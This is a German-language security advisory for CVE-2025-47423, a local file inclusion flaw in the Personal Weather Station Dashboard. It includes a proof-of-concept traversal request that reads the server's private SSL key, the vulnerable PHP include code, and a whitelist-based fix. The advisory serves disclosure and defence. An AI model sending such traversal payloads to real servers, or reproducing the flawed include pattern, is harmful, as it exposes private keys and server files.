
Detaillierte Offenlegung von CVE-2025-47423: Lokale Dateieinbindung im Dashboard für persönliche Wetterstation 12_lts. Enthält PoC, Analyse des verwundbaren Codes und Empfehlungen für sichere Korrekturen für defensives Lernen.
Entdeckt von: Matthew Eagle
Status: Öffentliche Offenlegung
Gemeldet am: 2025-05-05
CVE ID: CVE-2025-47423
Eine Schwachstelle zur lokalen Dateieinbindung (LFI) im Personal Weather Station Dashboard Version 12_lts ermöglicht nicht authentifizierten entfernten Angreifern, beliebige Dateien auf dem Server zu lesen. Die Ausnutzung dieser Schwachstelle gewährt Zugriff auf sensible Dateien, einschließlich privater SSL-Schlüssel, und kann die Vertraulichkeit und Integrität von HTTPS-Verbindungen gefährden.
/others/_test.phptest (über GET)Diese Schwachstelle ermöglicht entfernten Angreifern:
server.key)CVSS: 5.8 Mittel
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com
Antwort:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);
Die str_replace-Funktion ist unzureichend, um Directory Traversal zu verhindern.
basename() bereinigen und gegen erlaubte Dateien prüfen$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';
if (!in_array($script, $allowed_tests)) {
die("Invalid test file.");
}
include(__DIR__ . '/scripts/' . $script);
| Datum | Ereignis |
|---|---|
| 2025-05-05 | Sicherheitslücke an PWS-Dashboard-Moderatoren gemeldet |
| 2025-05-06 | Bestätigung und Tests beobachtet |
| 2025-05-07 | CVE-2025-47423 über MITRE reserviert |
| TBD | Öffentlicher Patch und CVE-Eintrag ausstehend |
Wenn Sie das Personal Weather Station Dashboard 12_lts verwenden, sollten Sie:
_test.php sofort entfernen oder aktualisierenSicherheitslücke entdeckt und verantwortungsvoll offengelegt von Matthew Eagle
Kontakt: [email protected]
Die Offenlegung erfolgte in Abstimmung mit den Richtlinien für verantwortungsvolle Offenlegung. Dieses Dokument wird zu Bildungs- und Verteidigungszwecken veröffentlicht.